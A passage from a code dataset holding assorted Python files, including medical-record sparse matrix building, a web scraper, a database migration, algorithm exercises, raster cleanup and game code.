= None,\n) -> NoReturn:\n    raise CustomException(message=error.messages, status=422)\n\n\n@web.middleware\nasync def intercept_error(request, handler):\n    try:\n        return await handler(request)\n    except CustomException as e:\n        return web.json_response(e.message, status=e.status)\n","repo_name":"ViAchKoN/Projects-Python-BestJobApp","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35918541103","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\ndef load_data_set(file_name):\r\n    \"\"\" Load the data set file; this function does not return class labels \"\"\"\r\n    data_mat = []\r\n    openfile = open(file_name)\r\n    for line in openfile.readlines():\r\n        cur_line = line.strip().split('\\t')\r\n        float_line = list(map(float, cur_line))\r\n        # if sum(float_line) != 0:\r\n        data_mat.append(float_line)\r\n    return data_mat\r\n","repo_name":"guoweikuang/analyse_web","sub_path":"weibo_showing/app/python_analyse/load_data_set.py","file_name":"load_data_set.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
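The load_data_set helper in the record above reads one sample per line, with tab-separated float features and no label column. A short usage sketch (the file name and row contents are made-up assumptions for illustration):

    # data.tsv rows look like: 1.0<TAB>2.5<TAB>-0.3
    data_mat = load_data_set('data.tsv')
    print(len(data_mat), len(data_mat[0]))  # sample count, feature count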
+{"seq_id":"34099632872","text":"import sys\nimport json\nimport pandas as pd\nimport numpy as np\nimport sparse\nimport os\nimport gc\nimport time\n\nfrom os.path import dirname, abspath, join\nfrom omop_learn.utils.data_utils import to_unixtime, from_unixtime\nfrom omop_learn.data.common import ConceptTokenizer\n\ndef process_line(line):\n '''\n Process line of data into a json object with visit dates and times\n @param line: str\n @return: json object\n '''\n example = json.loads(line)\n dates = example['dates']\n unix_times = to_unixtime(dates)\n example['unix_times'] = unix_times\n\n # make sure visits are sorted by date\n sorted_visits = [v for d, v in sorted(zip(example['unix_times'], example['visits']))]\n example['visits'] = sorted_visits\n example['unix_times'] = sorted(example['unix_times'])\n example['dates'] = sorted(example['dates'])\n\n return example\n\ndef build_3d_sparse_feature_matrix(tokenizer,\n data_folder,\n logger):\n '''\n Build sparse feature matrix\n Writes intermediate chunks to disk to run faster\n @param tokenizer: ConceptTokenizer\n @param data_folder: str, folder containing data.json\n @param logger: logger, for INFO messages\n @return: 1. 3d sparse feature matrix\n 2. list of times corresponding to dim 1 in matrix\n 3. list of person_ids corresponding to dim 0 in matrix\n '''\n chunk_size = 10000\n final_chunk_file = data_folder + 'sparse_matrix_components_chunks_finished.txt'\n if os.path.exists(final_chunk_file):\n with open(final_chunk_file, 'r') as f:\n final_chunk_text = f.read()\n num_people = int(final_chunk_text.split(' ')[1])\n else:\n # Build 3d sparse feature matrix\n # After every chunk of samples, save to disk and start building these again from an empty list\n concepts = []\n times = []\n persons = []\n times_set = set()\n person_ids = []\n\n # Build in smaller chunks of samples and then extend overall lists above\n small_chunk_size = 100\n small_chunk_concepts = []\n small_chunk_times = []\n small_chunk_persons = []\n small_chunk_times_set = set()\n small_chunk_person_ids = []\n\n start_time = time.time()\n # Process the json data file by line\n # A line constitutes an entire person worth of data\n with open(data_folder + 'data.json', 'r') as json_fh:\n for person_id, line in enumerate(json_fh):\n\n # This is a person\n example = process_line(line)\n small_chunk_person_ids.append(example['person_id'])\n\n # These are the visits, which can have many concepts each\n for i, v in enumerate(example['unix_times']):\n\n # This is the number of concepts in this visit\n visit_concept_num = len(example['visits'][i])\n\n # Extend lists by the number of concepts in this visit\n small_chunk_concepts.extend(example['visits'][i])\n small_chunk_times.extend([v]*visit_concept_num)\n small_chunk_persons.extend([person_id]*visit_concept_num)\n\n # Make a time set for use in mapping later\n small_chunk_times_set.add(v)\n del example\n\n if person_id % small_chunk_size == small_chunk_size - 1:\n # add these small chunks of samples to larger chunks\n concepts.extend(small_chunk_concepts)\n times.extend(small_chunk_times)\n persons.extend(small_chunk_persons)\n times_set = times_set.union(small_chunk_times_set)\n person_ids.extend(small_chunk_person_ids)\n small_chunk_concepts = []\n small_chunk_times = []\n small_chunk_persons = []\n small_chunk_times_set = set()\n small_chunk_person_ids = []\n gc.collect()\n logger.info('Processed ' + str(person_id + 1) + ' people in sparse feature matrix creation in '\n + str(time.time() - start_time) + ' seconds')\n\n if 
person_id % chunk_size == chunk_size - 1:\n # save chunk to disk\n save_start_time = time.time()\n concepts_mapped = tokenizer.concepts_to_ids(concepts)\n with open(data_folder + 'sparse_matrix_components_chunk' + str(person_id + 1) + '.json', 'w') as f:\n json_contents = {'concepts_mapped': concepts_mapped,\n 'times' : times,\n 'times_set' : list(times_set),\n 'persons' : persons,\n 'person_ids' : person_ids}\n json.dump(json_contents, f)\n del concepts_mapped\n concepts = []\n times = []\n persons = []\n times_set = set()\n person_ids = []\n logger.info('Saved chunk ' + str(person_id + 1) + ' to disk in '\n + str(time.time() - save_start_time) + ' seconds')\n\n num_people = person_id + 1\n if len(small_chunk_person_ids) > 0:\n concepts.extend(small_chunk_concepts)\n times.extend(small_chunk_times)\n persons.extend(small_chunk_persons)\n times_set = times_set.union(small_chunk_times_set)\n person_ids.extend(small_chunk_person_ids)\n del small_chunk_concepts\n del small_chunk_times\n del small_chunk_persons\n del small_chunk_times_set\n del small_chunk_person_ids\n \n if len(person_ids) > 0:\n # save remaining samples after last complete chunk to disk\n save_start_time = time.time()\n concepts_mapped = tokenizer.concepts_to_ids(concepts)\n with open(data_folder + 'sparse_matrix_components_chunk' + str(num_people) + '.json', 'w') as f:\n json_contents = {'concepts_mapped': concepts_mapped,\n 'times' : times,\n 'times_set' : list(times_set),\n 'persons' : persons,\n 'person_ids' : person_ids}\n json.dump(json_contents, f)\n del json_contents\n del concepts_mapped\n del concepts\n del times\n del persons\n del times_set\n del person_ids\n gc.collect()\n logger.info('Saved last chunk ' + str(num_people) + ' to disk in '\n + str(time.time() - save_start_time) + ' seconds')\n else:\n logger.info('Last chunk already contained all people. 
No additional chunk to save to disk.')\n with open(data_folder + 'sparse_matrix_components_chunks_finished.txt', 'w') as f:\n f.write('Saved ' + str(num_people) + ' people in chunks to disk for sparse feature matrix creation')\n\n logger.info('Finished processing all ' + str(num_people) + ' people to chunks in sparse feature matrix creation in '\n + str(time.time() - start_time) + ' seconds')\n \n # Read all chunks back to create sparse matrix\n start_time = time.time()\n concepts_mapped_list_over_chunks = []\n times_list_over_chunks = []\n all_times_set = set()\n persons_list_over_chunks = []\n person_ids_list_over_chunks = []\n chunk_end = chunk_size\n while chunk_end < num_people:\n # load chunk\n with open(data_folder + 'sparse_matrix_components_chunk' + str(chunk_end) + '.json', 'r') as f:\n json_contents = json.load(f)\n concepts_mapped_list_over_chunks.append(np.array(json_contents['concepts_mapped']))\n times_list_over_chunks.append(json_contents['times'])\n all_times_set = all_times_set.union(set(json_contents['times_set']))\n persons_list_over_chunks.append(np.array(json_contents['persons']))\n person_ids_list_over_chunks.append(np.array(json_contents['person_ids']))\n logger.info('Loaded chunks of ' + str(chunk_end) + ' people in ' \n + str(time.time() - start_time) + ' seconds')\n chunk_end += chunk_size\n \n if num_people % chunk_size != 0:\n # load last chunk\n with open(data_folder + 'sparse_matrix_components_chunk' + str(num_people) + '.json', 'r') as f:\n json_contents = json.load(f)\n concepts_mapped_list_over_chunks.append(np.array(json_contents['concepts_mapped']))\n times_list_over_chunks.append(json_contents['times'])\n all_times_set = all_times_set.union(set(json_contents['times_set']))\n persons_list_over_chunks.append(np.array(json_contents['persons']))\n person_ids_list_over_chunks.append(np.array(json_contents['person_ids']))\n logger.info('Loaded all chunks of ' + str(num_people) + ' people in '\n + str(time.time() - start_time) + ' seconds')\n \n # Now make a dict of our times\n start_time = time.time()\n all_times_list = sorted(list(all_times_set))\n del all_times_set\n all_times_map = {visit_time: i for i, visit_time in enumerate(all_times_list)}\n\n # Equivalent to ConceptTokenizer concepts_to_ids\n all_times_mapped_list_over_chunks = []\n for chunk_times in times_list_over_chunks:\n chunk_times_mapped = np.empty(len(chunk_times), dtype=int)\n for idx in range(len(chunk_times)):\n chunk_times_mapped[idx] = all_times_map[chunk_times[idx]]\n all_times_mapped_list_over_chunks.append(chunk_times_mapped)\n del times_list_over_chunks\n gc.collect()\n logger.info('Mapped times to indices in ' + str(time.time() - start_time) + ' seconds')\n \n # Now concatenate all lists over chunks\n start_time = time.time()\n all_concepts_mapped = np.concatenate(concepts_mapped_list_over_chunks)\n all_times_mapped = np.concatenate(all_times_mapped_list_over_chunks)\n all_persons = np.concatenate(persons_list_over_chunks)\n all_person_ids = np.concatenate(person_ids_list_over_chunks)\n del concepts_mapped_list_over_chunks\n del all_times_mapped_list_over_chunks\n del persons_list_over_chunks\n del person_ids_list_over_chunks\n gc.collect()\n logger.info('Concatenated all chunks in ' + str(time.time() - start_time) + ' seconds')\n\n # Build 3D sparse matrix representation of the data\n # persons x times x concepts\n start_time = time.time()\n feature_matrix = sparse.COO(\n [all_persons, all_times_mapped, all_concepts_mapped], 1, \n shape=(len(set(all_persons)), \n 
len(all_times_map), \n len(tokenizer.concept_map))\n )\n del all_persons\n del all_times_mapped\n del all_concepts_mapped\n gc.collect()\n logger.info('Built 3d sparse matrix in ' + str(time.time() - start_time) + ' seconds')\n \n return feature_matrix, all_times_list, all_person_ids","repo_name":"clinicalml/large-scale-temporal-shift-study","sub_path":"utils/omop_windowed_utils.py","file_name":"omop_windowed_utils.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"21684919901","text":"\"\"\"\n•• P3.3 Write a program that reads an integer and prints how many digits the number has, by \nchecking whether the number is ≥ 10, ≥ 100, and so on. (Assume that all integers are\nless than ten billion.) If the number is negative, first multiply it by –1.\n\"\"\"\n#My approach\ndef main():\n user_input = input(\"Please enter your number: \")\n length = len(user_input)\n if user_input[0] == '-':\n length = len(user_input) - 1\n print(f\"{length}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"borzoian40/Python-For-Everyone-Horstmann","sub_path":"Chapter 3/P3.03.py","file_name":"P3.03.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1688307075","text":"from collections import deque\n\n\ndef solution():\n # 테스트 케이스의 개수(num_tc) 입력받기\n num_tc = int(input())\n for tc in range(num_tc):\n # 팀의 수(num_t) 입력받기\n num_t = int(input())\n # 각 팀의 순위(rank_t) 입력받기\n rank_t = list(map(int, input().split()))\n # 각 팀의 진입차수를 '0'으로 초기화\n in_degree = [0] * (num_t + 1)\n graph_r = [[False] * (num_t + 1) for _ in range(num_t + 1)]\n for i in range(num_t - 1):\n for j in range(i + 1, num_t):\n graph_r[rank_t[i]][rank_t[j]] = True\n in_degree[rank_t[j]] += 1\n # 상대적 등수가 바뀐 팀의 수\n num_c = int(input())\n for _ in range(num_c):\n a, b = map(int, input().split())\n\n if graph_r[a][b]:\n graph_r[a][b] = False\n graph_r[b][a] = True\n in_degree[b] -= 1\n in_degree[a] += 1\n else:\n graph_r[a][b] = True\n graph_r[b][a] = False\n in_degree[a] -= 1\n in_degree[b] += 1\n\n que_a = deque()\n answer = []\n\n for i in range(1, num_t + 1):\n if in_degree[i] == 0:\n que_a.append(i)\n\n check_cycle = False\n check_only = True\n # 순위대로 정렬되어야 하므로 큐의 원소는 1개로 유지되어야 한다.\n for _ in range(1, num_t + 1):\n # 큐에 원소가 없을 경우에, 사이클이 발생했다고 판명\n if len(que_a) == 0:\n check_cycle = True\n break\n # 큐에 원소가 2개이상 있을 때, 원소들 간의 순위를 매길 수 없다고 판명\n if len(que_a) > 1:\n check_only = False\n break\n\n now = que_a.popleft()\n answer.append(now)\n\n for i in range(1, num_t + 1):\n if graph_r[now][i]:\n in_degree[i] -= 1\n\n if in_degree[i] == 0:\n que_a.append(i)\n\n if check_cycle:\n print(\"IMPOSSIBLE\")\n\n elif not check_only:\n print(\"?\")\n\n else:\n for a in answer:\n print(a, end=\" \")\n print()\n\n return\n\n\nprint(solution())\n","repo_name":"junho-devv/algorithm-study","sub_path":"BACKJOONㅣ백준/단계별로 풀어보기/기타/3665_최종 순위.py","file_name":"3665_최종 순위.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26157674184","text":"\"\"\"Practicing some basic web scraping\n\nI am using the O'Reilly book, \"Web Scraping with Python\" by Ryan Mitchell.\nIt's a very readable book for a technical book.\n\nThis will just be basic demonstrations. 
No deep scraping of any websites,\nas I don't want to get in trouble.\n\"\"\"\n\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport sys, logging, requests\n\n__author__ = 'rnzucker'\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\ndef id_spoof():\n \"\"\"Simple browser agent spoofing\n \"\"\"\n session = requests.Session()\n headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\"}\n # Check to\n url = \"https://www.whatismybrowser.com/developers/what-http-headers-is-my-browser-sending\"\n req = session.get(url, headers=headers)\n\n bsObj = BeautifulSoup(req.text, \"html.parser\")\n print(bsObj.find(\"table\",{\"class\":\"table-striped\"}).get_text())\n\ndef main():\n # id_spoof()\n # try:\n # html = urlopen(\"http://www.pythonscraping.com/pages/page1.html\")\n # except HTTPError as e:\n # print(e)\n # return\n # if html is None:\n # print(\"URL is not found\")\n # return\n r = requests.get(\"http://www.pythonscraping.com/pages/page1.html\")\n # bsObj = BeautifulSoup(html.read(), \"html.parser\")\n print(r.text)\n bsObj = BeautifulSoup(r.text, \"html.parser\")\n # print(bsObj.h1)\n print(bsObj.body)\n\n\n\nmain()\n","repo_name":"rnzucker/web-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27752747518","text":"print('''\n1 - File Duplo\n2 - Alcatra\n3 - Picanha\n''')\ndesconto = 0\ntipo_carne = int(input(\"Tipo de carne: \"))\nquantidade = float(input(\"Quantidade em Kg: \"))\nforma_pagamento = input(\"Forma de pagamento (Dinheiro / Cartão): \").lower()\n\nif tipo_carne == 1:\n if quantidade <= 5:\n preco_total = quantidade * 34.90\n else:\n preco_total = quantidade * 35.80\n carne = \"File Duplo\"\nelif tipo_carne == 2:\n if quantidade <= 5:\n preco_total = quantidade * 44.90\n else:\n preco_total = quantidade * 46.80\n carne = \"Alcatra\"\nelif tipo_carne == 3:\n if quantidade <= 5:\n preco_total = quantidade * 66.90\n else:\n preco_total = quantidade * 67.80\n carne = \"Picanha\"\nelse:\n print(\"Opção inválida. 
Por favor, escolha um número entre 1 e 3.\")\n exit()\n\nif forma_pagamento == \"cartão\":\n desconto = preco_total * 0.05\n\nvalor_a_pagar = preco_total - desconto\n\nprint(f'''\nTipo de carne: {carne}\nQuantidade: {quantidade:.2f} Kg\nPreço total: R${preco_total:.2f}\nForma de pagamento: {forma_pagamento}\nDesconto: R${desconto:.2f}\nValor a pagar: R${valor_a_pagar:.2f}\n''')","repo_name":"LightHades/atividades-python","sub_path":"ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"755466264","text":"DEBUG_LEVEL = 2\n\n\n\nimport pygame as pg\ndef check_mouseover(rect):\n mos_x, mos_y = pg.mouse.get_pos()\n if mos_x > rect.left and mos_x < rect.right and mos_y > rect.top and mos_y < rect.bottom:\n return True\n else:\n return False\n\ndef debug_msg(msg,lvl):\n if DEBUG_LEVEL >= lvl:\n print(msg)\n\ndef filter_list(targets,search):\n for target in targets:\n for target_name in target:\n if target_name == search:\n return target[search]\ndef adjust_hsla(in_color,hsla_delta):\n in_color = list(in_color)\n hsla_delta = list(hsla_delta)\n out_color = []\n min_num = 0\n max_num = 100\n for i in range(len(in_color)):\n out = in_color[i] + hsla_delta[i]\n if out > max_num:\n out = max_num\n elif out < min_num:\n out = min_num\n out_color.append(out)\n return tuple(out_color)\n \n \ndef color_from_hsla(h,s,l,a):\n color = pg.Color(0)\n color.hsla = h,s,l,a\n return color\n\ndef color_to_hsla(r,g,b,a=255):\n return pg.Color(r,g,b,a).hsla \n \n\n'''\nexpected_vals = [0,1,2,3,4,4,3,2,1,0]\n\ndef constrain_val(in_val,val_min,val_max,method): \n if in_val > val_min and in_val < val_max: # Value is within the boundries, do nothing\n return in_val\n\n val = in_val\n out_val = 0\n if val_min != 0: # if min bound is not 0\n offset = val_min # define how far min_val is from 0, called 'offset'\n else: #\n offset = 0 # \n val -= offset # move everything down by offset\n val_min -= offset #\n val_max -= offset #\n val_range = (val_max-val_min) + 1 # range should be one more than the max - min\n\n\n if method == \"clamp\":\n # Clamp method - Clamps the returned number at the boundry\n # min_val if below boundry\n # max_val if above boundry\n if val < min_val:\n out_val = min_val\n else:\n out_val = max_val\n\n\n if method == \"zigzag\":\n val %= (val_range * 2)\n in_1n_range = (val >= val_min) and (val <= val_max)\n val = val if in_1n_range else val-1\n out_val = val_max - abs(val_max - val - 1)\n if method == \"overflow\":\n out_val = val % (val_max + 1)\n test = 0\n\n return out_val\n\n\ntest_range_min = 0\ntest_range_max = 100\nmin_bound = 0\nmax_bound = 4\nmethod = \"zigzag\"\nprint(\"Testing {} method with bounds {} to {} from inputs {} to {}\".format(method,min_bound,max_bound,test_range_min,test_range_max))\nfor i in range(test_range_min,test_range_max):\n \n n = constrain_val(i,min_bound,max_bound,method)\n is_test_passed = False\n if n == expected_vals[i % (len(expected_vals)-1)]:\n is_test_passed = True\n print(\"{} - [{}] = {}\".format(is_test_passed,i,n))\n\n'''","repo_name":"benczech212/Py_Bingo","sub_path":"game/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36556845830","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"Database migrations for resource-providers.\"\"\"\n\nfrom migrate import UniqueConstraint\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import Float\nfrom sqlalchemy import Index\nfrom sqlalchemy import Integer\nfrom sqlalchemy import MetaData\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import Unicode\n\n\ndef upgrade(migrate_engine):\n meta = MetaData()\n meta.bind = migrate_engine\n\n if migrate_engine.name == 'mysql':\n nameargs = {'collation': 'utf8_bin'}\n else:\n nameargs = {}\n resource_providers = Table(\n 'resource_providers', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('uuid', String(36), nullable=False),\n Column('name', Unicode(200, **nameargs), nullable=True),\n Column('generation', Integer, default=0),\n Column('can_host', Integer, default=0),\n UniqueConstraint('uuid', name='uniq_resource_providers0uuid'),\n UniqueConstraint('name', name='uniq_resource_providers0name'),\n Index('resource_providers_name_idx', 'name'),\n Index('resource_providers_uuid_idx', 'uuid'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n inventories = Table(\n 'inventories', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('resource_provider_id', Integer, nullable=False),\n Column('resource_class_id', Integer, nullable=False),\n Column('total', Integer, nullable=False),\n Column('reserved', Integer, nullable=False),\n Column('min_unit', Integer, nullable=False),\n Column('max_unit', Integer, nullable=False),\n Column('step_size', Integer, nullable=False),\n Column('allocation_ratio', Float, nullable=False),\n Index('inventories_resource_provider_id_idx',\n 'resource_provider_id'),\n Index('inventories_resource_provider_resource_class_idx',\n 'resource_provider_id', 'resource_class_id'),\n Index('inventories_resource_class_id_idx',\n 'resource_class_id'),\n UniqueConstraint('resource_provider_id', 'resource_class_id',\n name='uniq_inventories0resource_provider_resource_class'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n allocations = Table(\n 'allocations', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('id', Integer, primary_key=True, nullable=False),\n Column('resource_provider_id', Integer, nullable=False),\n Column('consumer_id', String(36), nullable=False),\n Column('resource_class_id', Integer, nullable=False),\n Column('used', Integer, nullable=False),\n Index('allocations_resource_provider_class_used_idx',\n 'resource_provider_id', 'resource_class_id',\n 'used'),\n Index('allocations_resource_class_id_idx',\n 'resource_class_id'),\n Index('allocations_consumer_id_idx', 'consumer_id'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n resource_provider_aggregates = Table(\n 'resource_provider_aggregates', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('resource_provider_id', Integer, primary_key=True,\n 
nullable=False),\n Column('aggregate_id', Integer, primary_key=True, nullable=False),\n Index('resource_provider_aggregates_aggregate_id_idx',\n 'aggregate_id'),\n mysql_engine='InnoDB',\n mysql_charset='latin1'\n )\n\n for table in [resource_providers, inventories, allocations,\n resource_provider_aggregates]:\n table.create(checkfirst=True)\n","repo_name":"starlingx-staging/stx-nova","sub_path":"nova/db/sqlalchemy/api_migrations/migrate_repo/versions/016_resource_providers.py","file_name":"016_resource_providers.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"12817178877","text":"import sys\nfrom collections import deque\n\n\ndef solution():\n global n, tree\n\n answer = {i:0 for i in range(2, n+1)}\n v = [0 for _ in range(n+1)]\n q = deque()\n q.append(1)\n v[1] = 1\n\n while q:\n parent = q.pop()\n for c in tree[parent]:\n if v[c]:\n continue\n\n answer[c] = parent\n v[c] = 1\n q.append(c)\n\n for p in answer.values():\n print(p)\n\n\nn = int(sys.stdin.readline())\ntree = {i:[] for i in range(1, n+1)}\nfor i in range(n-1):\n k, v = map(int, sys.stdin.readline().strip().split(\" \"))\n tree[k].append(v)\n tree[v].append(k)\n\nsolution()","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/백준_트리의_부모_찾기.py","file_name":"백준_트리의_부모_찾기.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"5139886506","text":"import rasterio\nimport os, glob\nimport numpy as np\nfrom tqdm import tqdm\n\ndef remove_img_nodata(fp_img_mask_check, fp_img, percent_zeros=90):\n with rasterio.open(fp_img_mask_check) as src:\n img = src.read()\n number_pixel = src.height*src.width\n\n number_pixel_0 = np.count_nonzero(img==0)\n if number_pixel_0/number_pixel > percent_zeros/100:\n if os.path.exists(fp_img_mask_check):\n os.remove(fp_img_mask_check)\n else:\n print(\"The file mask does not exist\")\n\n if os.path.exists(fp_img):\n os.remove(fp_img)\n else:\n print(\"The file img does not exist\")\n\n\n# def remove_img_nodata(fp_img_mask_check, fp_img, percent_zeros=90):\n# with rasterio.open(fp_img) as src:\n# img = src.read()\n# number_pixel = src.height*src.width\n\n \n# if np.all(img == 0):\n# if os.path.exists(fp_img_mask_check):\n# os.remove(fp_img_mask_check)\n# else:\n# print(\"The file mask does not exist\")\n\n# if os.path.exists(fp_img):\n# os.remove(fp_img)\n# else:\n# print(\"The file img does not exist\")\n\n\ndef get_list_name_fp(folder_dir, type_file = '*.tif'):\n \"\"\"\n Get all file path with file type is type_file.\n \"\"\"\n list_fp = []\n for file_ in glob.glob(os.path.join(folder_dir, type_file)):\n head, tail = os.path.split(file_)\n # list_fp.append(os.path.join(head, tail))\n list_fp.append(tail)\n return list_fp\n\nfd_img = r\"/home/skm/SKM16/Data/ThaiLandChangeDetection/BD_Chang/Data_Train_and_Model/cut256_128/image_cut_img_crop\"\nfd_img_mask_check = r\"/home/skm/SKM16/Data/ThaiLandChangeDetection/BD_Chang/Data_Train_and_Model/cut256_128/image_cut_img_mask_crop\"\n\nlist_name = get_list_name_fp(fd_img_mask_check)\n\ni = 0\nsum_all = len(list_name)\nphan_tram = 10\nnum_get = sum_all//phan_tram\nfor name in tqdm(list_name):\n i += 1\n if i%num_get == 0:\n continue\n else:\n fp_img = os.path.join(fd_img, name)\n fp_mask = os.path.join(fd_img_mask_check, name)\n # print(fp_img)\n remove_img_nodata(fp_mask, fp_img, 
percent_zeros=99.9)\n","repo_name":"anhbn995/GOGOOK","sub_path":"Proccesing_all/remove_mask255_nhieu.py","file_name":"remove_mask255_nhieu.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285413318","text":"#\n# @lc app=leetcode id=430 lang=python3\n#\n# [430] Flatten a Multilevel Doubly Linked List\n#\n# https://leetcode.com/problems/flatten-a-multilevel-doubly-linked-list/description/\n#\n# algorithms\n# Medium (48.84%)\n# Likes: 818\n# Dislikes: 127\n# Total Accepted: 59.2K\n# Total Submissions: 120.1K\n# Testcase Example: '[1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\\r'\n#\n# You are given a doubly linked list which in addition to the next and previous\n# pointers, it could have a child pointer, which may or may not point to a\n# separate doubly linked list. These child lists may have one or more children\n# of their own, and so on, to produce a multilevel data structure, as shown in\n# the example below.\n# \n# Flatten the list so that all the nodes appear in a single-level, doubly\n# linked list. You are given the head of the first level of the list.\n# \n# \n# Example 1:\n# \n# \n# Input: head = [1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\n# Output: [1,2,3,7,8,11,12,9,10,4,5,6]\n# Explanation:\n# \n# The multilevel linked list in the input is as follows:\n# \n# \n# \n# After flattening the multilevel linked list it becomes:\n# \n# \n# \n# \n# Example 2:\n# \n# \n# Input: head = [1,2,null,3]\n# Output: [1,3,2]\n# Explanation:\n# \n# The input multilevel linked list is as follows:\n# \n# ⁠ 1---2---NULL\n# ⁠ |\n# ⁠ 3---NULL\n# \n# \n# Example 3:\n# \n# \n# Input: head = []\n# Output: []\n# \n# \n# \n# \n# How multilevel linked list is represented in test case:\n# \n# We use the multilevel linked list from Example 1 above:\n# \n# \n# ⁠1---2---3---4---5---6--NULL\n# ⁠ |\n# ⁠ 7---8---9---10--NULL\n# ⁠ |\n# ⁠ 11--12--NULL\n# \n# The serialization of each level is as follows:\n# \n# \n# [1,2,3,4,5,6,null]\n# [7,8,9,10,null]\n# [11,12,null]\n# \n# \n# To serialize all levels together we will add nulls in each level to signify\n# no node connects to the upper node of the previous level. 
The serialization\n# becomes:\n# \n# \n# [1,2,3,4,5,6,null]\n# [null,null,7,8,9,10,null]\n# [null,11,12,null]\n# \n# \n# Merging the serialization of each level and removing trailing nulls we\n# obtain:\n# \n# \n# [1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\n# \n# \n# Constraints:\n# \n# \n# Number of Nodes will not exceed 1000.\n# 1 <= Node.val <= 10^5\n# \n# \n#\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\nclass Solution:\n def flatten(self, head: 'Node') -> 'Node':\n # DFS by Recursion\n # Time complexity: O(N)\n # Space complexity: O(N)\n # def flatten_dfs(prev, curr):\n # if not curr:\n # return prev\n\n # curr.prev = prev\n # prev.next = curr\n\n # # the curr.next would be tempered in the recursive function\n # tempNext = curr.next\n # tail = flatten_dfs(curr, curr.child)\n # curr.child = None\n # return flatten_dfs(tail, tempNext)\n\n # if not head: return head\n\n # # pseudo head to ensure the `prev` pointer is never none\n # pseudoHead = Node(None, None, head, None)\n # flatten_dfs(pseudoHead, head)\n\n # # detach the pseudo head from the real head\n # pseudoHead.next.prev = None\n # return pseudoHead.next\n\n\n # DFS by Iteration\n # Time complexity: O(N)\n # Space complexity: O(N)\n if not head:\n return\n\n pseudoHead = Node(0, None, head, None)\n prev = pseudoHead\n\n stack = [head,]\n\n while stack:\n curr = stack.pop()\n\n prev.next = curr\n curr.prev = prev\n\n if curr.next:\n stack.append(curr.next)\n\n if curr.child:\n stack.append(curr.child)\n # don't forget to remove all child pointers.\n curr.child = None\n\n prev = curr\n\n # detach the pseudo head node from the result.\n pseudoHead.next.prev = None\n return pseudoHead.next\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"430.flatten-a-multilevel-doubly-linked-list.py","file_name":"430.flatten-a-multilevel-doubly-linked-list.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"29552946625","text":"import abc\nfrom pokemon import *\nfrom random import choice\nfrom time import time\nfrom minimax import *\nimport matplotlib.pyplot as plt\n\n# Joueur #\nclass Joueur(metaclass = abc.ABCMeta):\n \"\"\"Définit un joueur\"\"\"\n def __init__(self, joueur, nom):\n self.id = joueur #identifient\n self.historique_temps = []#historique des temps de réponse \n self.nom = nom\n\n def __call__(self, jeu, etat):\n t = time()\n mvt = self.strategie(jeu, 